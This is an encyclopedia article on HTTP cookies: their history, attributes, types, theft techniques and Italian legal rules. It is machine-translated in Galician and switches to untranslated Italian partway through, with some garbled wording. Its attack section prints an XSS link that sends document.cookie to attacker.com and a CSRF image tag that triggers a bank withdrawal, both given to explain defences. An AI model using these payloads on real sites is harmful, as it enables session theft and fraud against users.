Cookies

Da Wikipedia, a enciclopedia libre.
Ir á navegación Ir á busca
Nota de desambiguación.svg Desambiguación : se está a buscar outros significados, consulte Cookie (desambiguación) .
Exemplo dunha resposta HTTP de google.com que establece unha cookie con atributos.

As cookies HTTP ( pron. / ˈKuki / ; máis precisamente chamadas cookies web ou cookies por excelencia) [1] son un tipo particular de cookies máxicas (unha especie de token de identificación) e son utilizadas polas aplicacións web do servidor para almacenar e recuperar información a longo prazo do lado do cliente .

Historia

O concepto e o termo cookie , que literalmente significa "cookie", derivan da cookie máxica ( cookie máxica ) unha técnica coñecida no contorno UNIX xa nos anos 80 e que normalmente se usa para implementar mecanismos de identificación dun cliente nun servidor , como como exemplo a autenticación do servidor X Window System .

O primeiro uso das cookies HTTP remóntase a 1994, cando se usaban para comprobar se os lectores do sitio Netscape xa o visitaran antes. En 1995, a xestión de cookies integrouse en Internet Explorer 2. A introdución de cookies non foi coñecida inicialmente por un gran público, pero iniciouse despois dun artigo publicado no Financial Times o 12 de febreiro de 1996 [2] . O debate que se seguiu tivo como tema as implicacións das cookies no segredo. As cookies foron obxecto de dúas audiencias da Comisión Federal de Comercio dos Estados Unidos en 1996 e 1997. A partir destas datas comezouse a regular o uso das cookies.

Hoxe en día as aplicacións máis comúns refírense ao almacenamento de información sobre os hábitos do usuario nos sitios web que visita. Estas aplicacións a miúdo suscitaron dúbidas por parte dos defensores da privacidade dos surfistas, de feito unha cookie pode axudarnos na navegación ou espialos. Este segundo caso inclúe moitas cadeas publicitarias (que venden publicidade a moitos sitios diferentes) que utilizan unha cookie unida á imaxe publicitaria para correlacionar as visitas do mesmo usuario a varios sitios diferentes, creando así unha especie de perfil dos máis diversos sitios. apreciado. Outros usos que se consideran convenientes porque utilizan a cookie como servizo para o usuario son, por exemplo, a gravación dos datos dunha sesión para evitar a necesidade dunha nova autenticación nunha visita posterior (como fai Wikipedia para os seus usuarios rexistrados) ou mantén o contido do "carro da compra" nos sitios de comercio electrónico .

Descrición

Xeneralidade

Os servidores envían cookies ao cliente na resposta HTTP e espérase que os navegadores web garden e envíen cookies ao servidor sempre que se fagan solicitudes adicionais ao servidor web .

Este recoñecemento permite a creación de mecanismos de autenticación empregados por exemplo para os inicios de sesión ; almacenar datos útiles para a sesión de navegación, como preferencias sobre o aspecto gráfico ou lingüístico do sitio ; rastrexar a navegación do usuario, por exemplo con fins estatísticos ou publicitarios; para asociar datos almacenados polo servidor, por exemplo, o contido da cesta da compra dunha tenda electrónica .

Dadas as implicacións para a privacidade dos internautas, o uso de cookies está categorizado e regulado nos sistemas legais de numerosos países, incluídos os europeos, incluída Italia. A seguridade dunha cookie de autenticación xeralmente depende da seguridade do sitio que a emite, do navegador web do usuario e depende de se a cookie está cifrada ou non. As vulnerabilidades de seguridade poden permitir aos piratas informáticos ler os datos das cookies , que se poderían usar para acceder aos datos do usuario ou para acceder (con credenciais de usuario) ao sitio web ao que pertence a cookie (ver scripts entre sitios e falsificación de solicitudes entre sitios) por exemplo). [3]

Cookies, en particular as cookies de terceiros, son comunmente usados para a investigación de navegación tenda de usuario; estes datos sensibles poden ser unha ameaza potencial para a privacidade dos usuarios; precisamente isto levou ás autoridades europeas [4] e estadounidenses a regular o seu uso a través dunha lei en 2011 [5] . De feito, a lexislación europea esixe a todos os sitios dos Estados membros que informen aos usuarios de que o sitio usa certos tipos de cookies .

características

En termos prácticos e non especializados, unha cookie é similar a un pequeno ficheiro, almacenado na computadora por sitios web mentres navega, útil para gardar preferencias e mellorar o rendemento dos sitios web. Isto optimiza a experiencia de navegación do usuario.

En detalle, unha cookie é unha pequena cadea de texto enviada por un servidor web a un cliente web (normalmente un navegador ) e logo enviada polo cliente ao servidor (sen ser modificada) cada vez que o cliente accede á mesma parte. mesmo dominio web . As cookies introducíronse orixinalmente para proporcionar aos usuarios un xeito de almacenar os elementos que querían mercar mentres navegan polo sitio web (o chamado "carro da compra").

Hoxe en día, con todo, o contido do carro dun usuario almacénase nunha base de datos do servidor en lugar dunha cookie do cliente. Para rastrexar a que usuario ten asignado o carro da compra, o servidor web envía ao cliente unha cookie que contén un identificador de sesión único (normalmente, unha longa serie de letras e números). Dado que as cookies se envían ao servidor a petición de cada cliente, o identificador de sesión enviarase ao servidor cada vez que o usuario visite unha páxina do sitio web, isto permítelle ao servidor saber o carro que lle proporcionará ao usuario.

Dado que as cookies de sesión só conteñen un identificador de sesión único, isto fai que a cantidade de información persoal que un sitio web poida almacenar sexa practicamente ilimitada. O sitio non se limita ás restricións sobre o tempo que pode durar a cadea de texto que compón unha cookie. As cookies de sesión tamén poden axudar a mellorar os tempos de carga da páxina, xa que a cantidade de información dunha cookie de sesión é pequena e require pouco ancho de banda.

A cookie principal, a que se usa para almacenar as opcións de todas as outras cookies, chámase cookie técnica (consentimento) ou a que preside o envío e recepción do paquete de información (marcadores).

Cada dominio ou parte do mesmo que se visita co navegador pode configurar cookies. Dado que unha páxina típica de Internet , como a dun xornal en rede, contén obxectos que proveñen de moitos dominios diferentes e cada un deles pode configurar cookies, é normal aloxar moitos centos de cookies no seu navegador.

A miúdo considérase que as cookies son programas reais e isto xera crenzas erróneas. En realidade son simples bloques de datos, incapaces, por si mesmos, de realizar ningunha acción no ordenador . En particular, non poden ser spyware ou virus . Non obstante, moitos cookies anti-spyware clasifican as cookies dalgúns sitios como spyware porque permiten a identificación do usuario. Os navegadores modernos permiten aos usuarios decidir se aceptan ou non as cookies, pero calquera rexeitamento fai que algúns obxectos sexan inutilizables. Por exemplo, os carros de compra implementados con cookies non funcionan en caso de denegación.

As cookies non só se usan en PC ou similares, senón tamén en teléfonos intelixentes e tabletas .

Operación

Unha cookie é unha cabeceira adicional presente nunha solicitude HTTP ( Cookie :) ou resposta ( Set-cookie :) : se o servidor quere asignarlle unha cookie ao usuario, engadiraa ás cabeceiras de resposta. O cliente debe notar a presenza da cookie e almacenala nunha área específica (normalmente utilízase un directorio onde se almacenan cada cookie nun ficheiro ). A cookie consta dunha cadea de texto arbitraria, unha data de caducidade (máis alá da cal non debe considerarse válida) e un patrón para recoñecer os dominios aos que se debe enviar de volta. Pódense configurar varias cookies nunha única resposta HTTP.

O navegador web cliente devolverá a cookie, sen ningunha modificación, anexándoa a todas as solicitudes HTTP que cumpran o patrón, dentro da data de caducidade. O servidor pode entón optar por asignar de novo a cookie, sobrescribindo a antiga. A reenviación de patróns permite que todos os subdominios dun determinado dominio reciban a cookie, se o desexa.

As cookies úsanse para engadir un estado a un protocolo sen estado. Sen cookies non habería diferenza nunha páxina cargada antes de iniciar sesión , desde a mesma páxina cargada despois. Dado que as cookies permanecen no sistema durante longos períodos, os sitios poden asignarlle un índice ao usuario e realizar un seguimento da súa navegación dentro do sitio, normalmente co propósito de crear estatísticas. Tamén se poden usar para rastrexar a navegación por sitios de terceiros, no caso de que estes sitios de terceiros utilicen contido do sitio que configurou a cookie. A publicidade en sitios adoita ser tratada por empresas que teñen anuncios en varios sitios web.

O contido do propio anuncio cárgase directamente desde o seu servidor (a través dunha solicitude HTTP) e móstrase de forma integrada no sitio que o usuario desexa visitar. Deste xeito, o servidor da empresa publicitaria recibirá o enderezo da páxina que se está a ver desde o navegador do usuario e poderá enviarlle unha cookie ao cliente. A través deste mecanismo, as empresas publicitarias poden agregar información sobre usuarios e crear perfís e mostrarlles anuncios dirixidos.

Uso

Dado que se poden usar para controlar a navegación en Internet , as cookies son obxecto de discusións sobre o dereito á privacidade . Moitos países e organizacións, incluídos os Estados Unidos e a Unión Europea , lexislaron sobre isto. As cookies tamén foron criticadas porque non sempre son capaces de identificar ao usuario con precisión e tamén porque poden estar suxeitas a ciberataques . Hai algunhas alternativas ás cookies, pero todas, xunto con algunhas vantaxes, teñen contraindicacións.

Na política de cookies, os xestores dun sitio web deben especificar detalladamente a política das cookies propias ou de terceiros.

As actividades para as que se utilizan son a autenticación , o seguimento da sesión e o almacenamento de información específica relativa aos usuarios que acceden ao servidor , como sitios web favoritos ou, no caso de compras en liña, o contido dos seus "carros da compra".

Incluso o motor de busca máis famoso do mundo, Google , envía unha cookie que almacena datos relativos ás buscas, palabras clave de busca e hábitos dos usuarios.

Máis concretamente, os diferentes usos das cookies son, polo tanto, os seguintes:

  • Para encher o carro da compra virtual en sitios comerciais (as cookies permítennos colocar ou eliminar artigos do carro en calquera momento).
  • Para permitir que un usuario inicie sesión nun sitio web.
  • Para personalizar a páxina web en función das preferencias do usuario (por exemplo, o motor de busca de Google permítelle ao usuario decidir cantos resultados de busca quere amosar por páxina).
  • Para rastrexar os camiños do usuario (normalmente utilizados polas empresas publicitarias para obter información sobre o navegador, os seus gustos e preferencias. Estes datos úsanse para rastrexar o perfil dun visitante para presentar só os banners publicitarios que lle poidan interesar).
  • Para a xestión dun sitio: as cookies son utilizadas polos responsables da actualización dun sitio para comprender como visitan os usuarios, que camiño seguen dentro do sitio. Se o camiño leva a calellas, o xestor pode notar e pode mellorar a navegación polo sitio.
  • Para compartir información das redes sociais con outros usuarios.

Moitos navegadores modernos permiten ao usuario decidir cando acepta as cookies, pero rexeitar algunhas non permite o uso dalgúns sitios (tomemos como exemplo o rexistro nun sitio web como Wikipedia).

A configuración pódese personalizar para habilitalos ou bloquealos sempre, nun determinado período de estadía, para filtrar sitios baseados en listas brancas e listas negras e filtrar as cookies que son usadas polo mesmo servidor ou tamén por ligazóns (a miúdo publicitarias) a sitios aloxados en diferentes servidores.

Cómpre ter en conta que o funcionamento das cookies depende totalmente do navegador de navegación que o usuario use: en teoría, este programa pode darlle ao usuario un control completo das cookies e permitir ou rexeitar a súa creación e difusión.Microsoft Internet Explorer só ten unha xestión rudimentaria das cookies, mentres que alternativas como Opera ou Mozilla Firefox dan ao usuario un maior control e permiten aceptar / rexeitar cookies de sitios específicos. Outros programas, que se empregarán como proxies , tamén permiten ao usuario un maior grao de control sobre o que acontece.

Un servidorTor ou proxy ten o efecto último, non en eliminar a dirección IP, senón en facer que pareza diferente á do seu ordenador. No caso de detectar a dirección IP, con estas medidas, non hai limitación no número de sitios navegables.

Estrutura

Elementos

Ao contrario do que se cre, unha cookie non é un pequeno ficheiro de texto: pode almacenarse nun ficheiro de texto, pero non necesariamente. Na cookie normalmente podemos atopar catro atributos:

  • Nome / valor é unha variable e un campo obrigatorio.
  • A data de caducidade é un atributo opcional que lle permite establecer a data de caducidade da cookie. Pode expresarse como unha data, como número máximo de días ou como Agora (implica que a cookie se elimina inmediatamente do ordenador do usuario xa que expira cando se crea) ou Nunca (nunca) (implica que a cookie non a fai) caducan e denomínanse persistentes).
  • O modo de acceso (HttpOnly) fai que a cookie sexa invisible para JavaScript e outros idiomas do cliente na páxina.
  • Seguro indica se a cookie debe enviarse cifrada con HTTPS .

Dominio e camiño

O dominio (dominio) e o camiño (camiño), definen o alcance da visibilidade da cookie, indican ao navegador que a cookie só se pode enviar ao servidor para o dominio e a ruta especificados. Se non se especifica, por defecto toman o valor do dominio e a ruta que os solicitou inicialmente. Un exemplo de directiva para a creación de cookies por un sitio web tras o inicio de sesión dun usuario é o seguinte:

Set-Cookie: LSID=DQAAAK…Eaem_vYg; Domain=docs.foo.com; Path=/accounts; Expires=Wed, 13-Jan-20021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn….DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-20021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P….GTEq; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-20021 22:23:01 GMT; Secure; HttpOnly
......

A primeira cookie LSID ten como dominio predeterminado docs.foo.com e ruta /accounts , que docs.foo.com ao navegador que use a cookie só cando a páxina solicitada conteña docs.foo.com/accounts . As outras 2 cookies HSID e SSID pódense enviar dende o navegador ao servidor cando se visitan, calquera dos subdominios de .foo.com con calquera camiño, por exemplo www.foo.com/ . As cookies só as poden establecer os principais dominios e os seus subdominios.

Tipos de cookies

A gran variedade de cookies no mundo da web dificulta a súa clasificación. Non obstante, é posible elaborar unha taxonomía xeral separándoas en diferentes categorías. [6] O principal atributo polo que podemos dividir as cookies é o seu ciclo de vida , que nos permite distinguilas en:

  • Cookies de sesión: estas cookies non se almacenan permanentemente no dispositivo do usuario e elimínanse cando o navegador está pechado [7] . A diferenza doutras cookies, as cookies de sesión non teñen data de caducidade e, en función diso, o navegador pode identificalas como tales.
  • Cookies persistentes: en vez de desaparecer cando o navegador está pechado, como é o caso das cookies de sesión, as cookies persistentes caducan nunha data específica ou despois dun determinado período de tempo. Isto significa que, durante toda a vida útil da cookie (que pode ser longa ou curta dependendo da data de caducidade que decidan os seus creadores), a súa información transmitirase ao servidor cada vez que o usuario visite o sitio web ou cada vez que o vexa. un recurso pertencente a ese sitio doutro sitio (por exemplo un anuncio). Por este motivo, os anunciantes poden empregar cookies persistentes para rexistrar información sobre os hábitos de navegación na web dun usuario durante un longo período de tempo. Non obstante, tamén se usan por motivos "lexítimos" (como manter rexistrados aos usuarios na súa conta en sitios web, para evitar introducir credenciais para acceder a sitios web en cada visita).

Despois é posible clasificar as cookies en función da súa orixe en:

  • Cookies propias: normalmente, o atributo de dominio dunha cookie corresponderá ao dominio que se mostra na barra de enderezos do navegador web; son cookies enviadas ao navegador directamente desde o sitio que está a visitar. Isto chámase cookie de primeira parte . Poden ser persistentes e de sesión; son xestionados directamente polo propietario e / ou xestor do sitio e úsanse, por exemplo, para garantir o seu funcionamento técnico ou facer un seguimento das preferencias expresadas respecto ao uso do sitio.
  • As cookies de terceiros: cookies de terceiros pertencen a outras que a mostrada na barra de enderezos dominios. Este tipo de cookies normalmente aparecen cando as páxinas web presentan contido, como anuncios de banners, de sitios web externos. Isto implica a posibilidade de supervisar o historial de navegación do usuario, e é frecuentemente usado polos anunciantes, nun intento de publicar anuncios relevantes e personalizados para cada usuario. Por exemplo, supoñamos que un usuario visita www.example.org . Este sitio web contén un anuncio de ad.foxytracking.com , que, unha vez descargado, establece unha cookie pertencente ao dominio publicitario ( ad.foxytracking.com ). Despois, o usuario visita outro sitio web, www.foo.com , que tamén contén un anuncio de ad.foxytracking.com/ , e que tamén establece unha cookie pertencente a ese dominio ( ad.foxytracking.com ). Finalmente, estas dúas cookies enviaranse ao vendedor ao cargar os seus anuncios ou visitar o seu sitio web. O anunciante pode usar estas cookies para crear un historial de navegación de usuarios en todos os sitios que teñan anuncios deste anunciante. A maioría dos navegadores web modernos conteñen axustes de privacidade que poden bloquear as cookies de terceiros.

Finalmente, é posible distinguilos do punto de vista do uso (ou propósito ) en:

  • Cookies técnicas: úsanse para a navegación (xa que son funcionalmente necesarias para desprazarse pola páxina, consultar o contido, prestar o servizo) e para facilitar o acceso e uso do sitio por parte do usuario. As cookies técnicas son esenciais, por exemplo, para acceder a Google ou Facebook sen ter que iniciar sesión en todas as sesións. Tamén o son en operacións moi delicadas como as de banca a domicilio ou o pago con tarxeta de crédito ou mediante outros sistemas.
  • Cookies estatísticas: úsanse co propósito de optimizar o sitio, directamente polo propietario do sitio, que pode recompilar información de forma agregada sobre o número de usuarios e como visitan o sitio. Nestas condicións, as mesmas regras aplícanse ás cookies estatísticas, en termos de información e consentimento, previstas para as cookies técnicas.
  • Cookies para almacenar preferencias: (tamén chamadas cookies funcionais ) son cookies útiles para favorecer o uso efectivo do sitio por parte do usuario e favorecer así a experiencia de navegación personalizada. Utilízanse, por exemplo, para facer un seguimento do idioma escollido.
  • Cookies de marketing e perfilado (publicidade): estas cookies están destinadas a proporcionar espazos publicitarios. Poden ser instalados polo propietario do sitio ou por terceiros. Algúns úsanse para recoñecer anuncios individuais e saber cales foron seleccionados e cando. Outras cookies publicitarias úsanse para hipotetizar o "perfil" de navegación dun usuario, co fin de poder propor mensaxes publicitarias acordes co seu comportamento e intereses na rede. Este "perfil" é anónimo e a información recollida a través destas cookies non permite rastrexar a identidade do usuario. Neste caso, a cookie preside un dos sistemas para pilotar a chamada "publicidade comportamental" [8] .
  • Cookies de rede social: son cookies que permiten compartir o contido do sitio que está a visitar con outros usuarios. Estas cookies úsanse normalmente para activar as funcións "Me gusta" ou "Seguir" de redes sociais como Facebook e Twitter, só por citar algunhas. Estas funcións permiten ás redes sociais identificar aos seus usuarios e recompilar información incluso mentres navegan por outros sitios.

Outros tipos útiles de cookies:

  • Cookie segura: unha cookie coa marca Secure só se pode transmitir a través dunha conexión cifrada (é dicir, HTTPS ). Isto diminúe a probabilidade de estar exposto ao roubo de galletas mediante as escoitas telefónicas. Para conseguilo, os navegadores que admitan esta marca só enviarán cookies coa marca Secure cando se solicite unha páxina HTTPS. Noutras palabras, o navegador non enviará unha cookie coa marca Secure nunha solicitude HTTP, é dicir, nunha conexión sen cifrar.
  • Cookie HttpOnly: as cookies coa bandeira HttpOnly só se poden usar se se transmiten a través de HTTP (ou HTTPS ). Non son accesibles a través de API non HTTP como JavaScript. Esta restrición elimina a ameaza de roubo de cookies mediante scripts entre sitios (XSS), evitando as ameazas de rastrexo entre sitios (XST) e falsificación de solicitudes entre sitios (CSRF) .
  • Cookie SameSite: Google Chrome 51 introduciu [9] unha nova SameSite que permite o envío da cookie só para solicitudes da mesma fonte, logrando así neutralizar ataques como CSRF e outros tipos de ataques.
  • Supercookie: o "supercookie" é unha cookie cunha orixe de dominio de primeiro nivel (por exemplo .com ) ou un sufixo público (por exemplo .co.uk ). As cookies comúns, por outra banda, orixínanse nun dominio determinado, por exemplo example.com . As supercookies poden ser un problema de seguridade potencial e, polo tanto, a miúdo son bloqueadas polos navegadores web. Se se desbloquea desde o ordenador cliente, un atacante, a través dun sitio web malicioso, podería configurar unha supercookie e potencialmente destruír ou redireccionar as solicitudes dos usuarios lexítimos a outro sitio web que comparta o mesmo dominio de nivel superior ou sufixo público que o sitio web. Por exemplo, unha supercookie cun dominio .com pode influír maliciosamente nunha solicitude avanzada a example.com , aínda que a cookie non se orixine en example.com . Pódese usar para falsificar o inicio de sesión ou modificar a información do usuario. A Lista de Sufixos Públicos [10] axuda a reducir o risco que se pode crear a través das supercookies. Esta lista é unha iniciativa transversal que ten como obxectivo proporcionar unha lista precisa e actualizada de nomes de dominio. As versións máis antigas dos navegadores non poden ter unha lista actualizada e, polo tanto, serán vulnerables ás supercookies de certos dominios.
  • Cookies zombies: as cookies zombies son cookies que se recrean automaticamente despois de ser eliminadas. Isto conséguese almacenando o contido das cookies en varias localizacións, como o almacenamento local flash, o almacenamento HTML5 e a través doutros mecanismos de arquivo tanto do cliente como do servidor. Cando se detecta a ausencia da cookie, recréase utilizando os datos almacenados nestes lugares. A biblioteca Evercookie dá un exemplo de cookie zombi.

Manipulacións sobre cookies

Un procedemento de manipulación de cookies é a intoxicación por cookies . Consiste en modificar o contido dunha cookie (por exemplo a información persoal gardada no ordenador do usuario) para eludir os mecanismos de seguridade . A través desta técnica, os atacantes poden obter información privada e non autorizada dun usuario, así como roubar a súa identidade dixital . As cookies almacenadas no ordenador do usuario conteñen información que permite ás aplicacións autenticar o ID de usuario, controlar o comportamento do usuario e personalizar o contido dun sitio. Xeralmente, estes datos están sometidos a cifrado , pero os algoritmos non sempre son seguros polo que algúns usuarios con intencións maliciosas poden roubar os nosos datos e usalos ou modificalos. Segundo a organización The Open Web Application Security Project, comúnmente coñecido como OWASP , a manipulación de cookies é un dos 20 ataques máis empregados polos hackers, especialmente nos sistemas de comercio electrónico , e úsase para identificar ao usuario.

A maioría dos sitios web utilizan as cookies como identificadores únicos para as sesións do usuario, xa que outros métodos de identificación teñen limitacións e vulnerabilidades. Non obstante, existe o risco de que poida permitir aos atacantes roubar e suplantar as peticións dos usuarios. Desde o punto de vista do servidor web, unha solicitude feita por un usuario con intención maliciosa (é dicir, un usuario que roubou as cookies doutros usuarios) non ten diferenza coa solicitude feita pola vítima.

Aquí enuméranse varias técnicas de roubo de cookies que só funcionan con sitios web que dependen de cookies HTTP para autenticar aos usuarios.

Intercepcións de rede

Pódese roubar unha cookie doutro ordenador interceptándoa desde a rede.

O tráfico dunha rede pode ser interceptado e lido por un ordenador conectado a unha rede diferente á do remitente e do destinatario (en particular cando está conectado a unha rede Wi-Fi sen cifrar). Este tráfico inclúe as cookies enviadas a través de sesións HTTP non cifradas e pode permitir aos atacantes ler comunicacións doutros usuarios da rede, incluídas as cookies HTTP , así como todo o contido das conversas, co propósito dun ataque de home no medio .

Un atacante podería usar cookies interceptadas para suplantar ao usuario que posúe as cookies e realizar operacións malintencionadas, como transferir cantidades de diñeiro da conta bancaria da vítima a outras contas, a miúdo non localizables.

Este problema pódese resolver a través dunha comunicación cifrada, entre o ordenador do usuario e o servidor web, usando Transport Layer Security (protocolo HTTPS ). O servidor pode especificar a marca segura ao configurar as cookies, de xeito que o navegador só pode enviar cookies por unha canle cifrada, como unha conexión SSL .

Subdominios falsos e intoxicación por caché DNS

Se un atacante é capaz de ocultar un servidor DNS e facer que o usuario use un falso / falso servidor DNS ( intoxicación por caché DNS ), entón isto podería permitirlle ao atacante acceder ás cookies do usuario. Por exemplo, un atacante podería usar o envelenamento de caché DNS para crear un falso DNS de f12345.www.example.com que realmente f12345.www.example.com á dirección IP do servidor do atacante . Este último pode entón inserir a imaxe URL do seu servidor (por exemplo, http://f12345.www.example.com/img_4_cookie.jpg) . As vítimas que lean a mensaxe do atacante descargarán esta imaxe de f12345.www.example.com . Dado que f12345.www.example.com é un subdominio de www.example.com , o navegador da vítima enviará todas as cookies de example.com ao servidor do atacante.

Se un utente malintenzionato è in grado di raggiungere questo obiettivo, di solito la colpa è dei fornitori dei servizi Internet ( Internet Service Providers ) che non hanno garantito una connessione sicura dei server DNS. Tuttavia, la gravità di questo attacco può essere ridotta se il sito destinatario utilizza i cookie protetti. In questo caso, l'utente malintenzionato avrà un ulteriore ostacolo, quello di ottenere il certificato SSL del sito Web di destinazione da un' autorità di certificazione , dal momento che i cookie sicuri possono essere trasmessi solo tramite una connessione criptata. Senza un certificato SSL, i browser delle vittime avrebbero visualizzato un messaggio di avviso relativo al certificato non valido del sito web dell'attaccante, che potrebbe aiutare gli utenti a non visitarlo, evitando così di inviare i cookie ad un sito non sicuro.

Cross-site scripting: furto dei cookie

Magnifying glass icon mgx2.svg Lo stesso argomento in dettaglio: Cross-site scripting .

I cookie possono anche essere rubati utilizzando una tecnica chiamata cross-site scripting . Ciò si verifica quando un attaccante sfrutta un sito web che permette agli utenti di inviare contenuto non filtrato HTML e JavaScript. Inviando dei contenuti malevoli HTML e JavaScript, l'attaccante può servirsi del browser della vittima per prendere il controllo dei suoi cookie.

A titolo di esempio, un utente malintenzionato può inviare un messaggio sul www.example.com con il seguente link:

 < a href = "#" onclick = "window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie); return false;" > Click here! </ a >
cross-site scripting: un cookie che dovrebbe essere scambiato solo tra server e client viene invece inviato all'attaccante.

Quando un altro utente clicca su questo link, il browser esegue un pezzo di codice all'interno dell'attributo onclick , sostituendo così la stringa document.cookie con la lista dei cookie che sono accessibili dalla pagina corrente. Come risultato, questo elenco di cookie viene inviato al server attacker.com . Se la connessione avviene mediante HTTPS https://www.example.com , i Secure cookie saranno inviati lo stesso ad attacker.com in formato testo.

È responsabilità degli sviluppatori dei siti web filtrare tale codice dannoso.

Tali attacchi possono essere ridotti utilizzando i cookie HttpOnly . Questi cookie non saranno accessibili dal lato client attraverso linguaggi di scripting come JavaScript e, quindi, l'attaccante non sarà in grado di rubare questi cookie.

Cross-site scripting: richiesta proxy

Nelle versioni più vecchie di molti browser, ci furono buchi di sicurezza che permisero agli attaccanti di sporcare gli script di una richiesta proxy, dal lato client, tramite XMLHttpRequest API. Ad esempio, la vittima sta leggendo un post di un attaccante su www.example.com , e lo script dell'attaccante viene eseguito nel browser della vittima. Lo script genera una richiesta per www.example.com con attacker.com come server proxy. Dal momento che la richiesta è per www.example.com , tutti i cookie di example.com verranno inviati insieme alla richiesta, tuttavia verranno instradati attraverso il server proxy dell'attaccante. Quindi, l'attaccante sarebbe in grado di intercettare i cookie della vittima.

Questo attacco non avrebbe funzionato con i Secure cookie, in quanto possono essere trasmessi solo su connessioni HTTPS , e il protocollo HTTPS implementa una crittografia end-to-end (vale a dire che le informazioni sono crittografate sul browser dell'utente e decifrate sul server di destinazione). In questo caso, il server proxy avrebbe visto solo i primi byte cifrati della richiesta HTTP.

Cross-site request forgery

Magnifying glass icon mgx2.svg Lo stesso argomento in dettaglio: Cross-site request forgery .

Ad esempio, Bob potrebbe navigare in un forum in cui un altro utente, Mallory, ha postato un messaggio. Supponiamo che Mallory abbia realizzato un'immagine HTML che fa riferimento ad un'operazione sul sito web della banca di Bob, (piuttosto che un file immagine) ad esempio:

 <img src= "http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory" >

Se la banca di Bob mantiene le sue informazioni di autenticazione in un cookie, e se il cookie non è scaduto, allora il tentativo da parte del browser di Bob di caricare l'immagine presenterà il modulo di rinuncia del suo cookie, autorizzando in tal modo una transazione senza l'approvazione di Bob.

Eliminazione

Una volta che si è impostato il browser perché accetti i cookie, essi sono archiviati in una speciale cartella del sistema, solitamente nel percorso dell'utente. Il percorso ove materialmente sono memorizzati i file corrispondenti dipende dalla combinazione tipologia dispositivo/sistema operativo/browser [11] . Si possono facilmente cancellare sia agendo sui comandi previsti dal browser (i medesimi che permettono di cancellare la cronologia, la cache , le informazioni di login , i dati di compilazione dei moduli, ecc.) oppure utilizzando uno dei tanti "pulitori" di terze parti, quali ad esempio CCleaner , Spybot- Search & Destroy . Oltre alla eliminazione massiva si può ricorrere a quella dei singoli file ma allora occorre riconoscerli agendo (nella cartella relativa) sugli specifici cookie di interesse.

Una volta eseguita l'eliminazione dei cookie, è normale che il browser ei vari siti web si ripresentino con delle richieste, rispettivamente, di personalizzazione impostazione e di accettazione cookie oppure la navigazione su siti abituali sia leggermente e inizialmente un poco più lenta: questo è dovuto, appunto, alla pulizia eseguita.

Aspetti giuridici

Legislazione italiana

In Italia la norma di riferimento relativamente ai cookie è l'art. 122 [12] del codice della privacy che nella sua formulazione a fine maggio 2012 recepisce la direttiva comunitaria 2009/136/CE [13] E-Privacy. È quindi necessario che l'utente, salvo casi particolari, sia informato e presti esplicitamente il consenso, prima che i cookie vengano salvati. Tale indicazione, pur se tesa a dare maggiori garanzie agli utenti, creò a suo tempo allerta negli operatori per il rischio che potesse compromettere le modalità di navigazione come le conosciamo oggi [14] .

Il 2 giugno 2015 divenne obbligatorio per i gestori di siti web adeguarsi al Provvedimento “Individuazione delle modalità semplificate per l'informativa e l'acquisizione del consenso per l'uso dei cookie” (Gazzetta Ufficiale n. 126 del 3 giugno 2014) dell'8 maggio 2014 [15] , con cui il Garante per la Protezione dei Dati Personali detta le regole sulle modalità di adempimento agli obblighi di rilascio dell'informativa e di acquisizione del consenso degli utenti in caso di utilizzo di cookie. Per tutti i siti web che utilizzano Cookie non tecnici (di profilazione) il Provvedimento stabilisce che nel momento in cui si accede ad una qualsiasi pagina del sito web deve immediatamente comparire in primo piano un banner [16] (contenente l'informativa breve) di idonee dimensioni, con caratteristiche tali da determinare una discontinuità dell'esperienza di navigazione, indicante:

a) L'utilizzo di Cookie di profilazione al fine di inviare messaggi pubblicitari in linea con le preferenze manifestate dall'utente nell'ambito della navigazione in rete;

b) se il sito consente l'invio di Cookie "terze parti";

c) il link all'informativa estesa;

d) la possibilità di negare il consenso all'installazione di qualunque cookie;

e) che la prosecuzione della navigazione comporta la prestazione del consenso all'uso dei cookie.

Al banner di informativa breve deve essere poi collegato un Cookie tecnico che permetta di tenere traccia del consenso dell'utente per le successive navigazioni sul medesimo sito internet.

Attraverso il banner di informativa, e attraverso i riferimenti in calce ad ogni pagina del sito, l'utente deve quindi poter accedere all'informativa estesa (la cosiddetta cookie policy ) che deve contenere tutti gli elementi previsti dall'art. 13 del Codice [17] , descrivere in maniera specifica e analitica le caratteristiche le finalità dei Cookie installati dal sito, consentire all'utente di selezionare o deselezionare i singoli cookie, contenere i link aggiornati alle informative e ai moduli di consenso delle terze parti con le quali l'editore ha stipulato accordi per l'installazione di Cookie tramite il proprio sito. Qualora l'editore abbia contatti indiretti con le terze parti, dovrà inserire i link dei siti che fanno da intermediari tra lui e le stesse terze parti.

L'informativa deve infine richiamare la possibilità per l'utente di manifestare le proprie opzioni in merito all'uso dei Cookie da parte del sito anche attraverso le impostazioni del browser, indicando almeno la procedura da eseguire per configurare tali impostazioni.

In caso di omessa o inidonea informativa, oltre che nelle previsioni di cui all'art. 13 del Codice, nel provvedimento è prevista la sanzione amministrativa del pagamento di una somma da seimila a trentaseimila euro (art. 161 del Codice).

L'installazione di Cookie sui terminali degli utenti in assenza del preventivo consenso degli stessi comporta, invece, la sanzione del pagamento di una somma da diecimila a centoventimila euro (art. 162, comma 2-bis, del Codice) [18]

L'omessa o incompleta notifica al Garante da parte di soggetti che utilizzano Cookie di 'profilazione' comporta una sanzione da venti mila a centoventi mila euro (art. 163 del Codice). Esclusi da tale obbligo sono coloro che non utilizzano direttamente i cookie di 'profilazione':

-siti che trasmettono cookie di 'profilazione' di "terze parti";

-siti che utilizzano direttamente cookie tecnici.

Il garante ha altresì fornito in merito ai casi in cui sia necessaria la notifica ulteriori chiarimenti nel documento web n. 993385 .

In merito ai chiarimenti richiesti sull'ambito di applicazione della normativa in materia di cookie [19] , si evidenzia che la stessa riguarda tutti i siti che, a prescindere dalla presenza di una sede nel territorio dello Stato, installano cookie sui terminali degli utenti, utilizzando quindi per il trattamento "strumenti situati sul territorio dello Stato" (cfr. art. 5, comma 2, del Codice privacy [20] ).

Dal 25 maggio 2018 la regolamentazione sui cookie è prescritta dal GDPR (vedi paragrafo).

La nuova legislazione europea: il GDPR

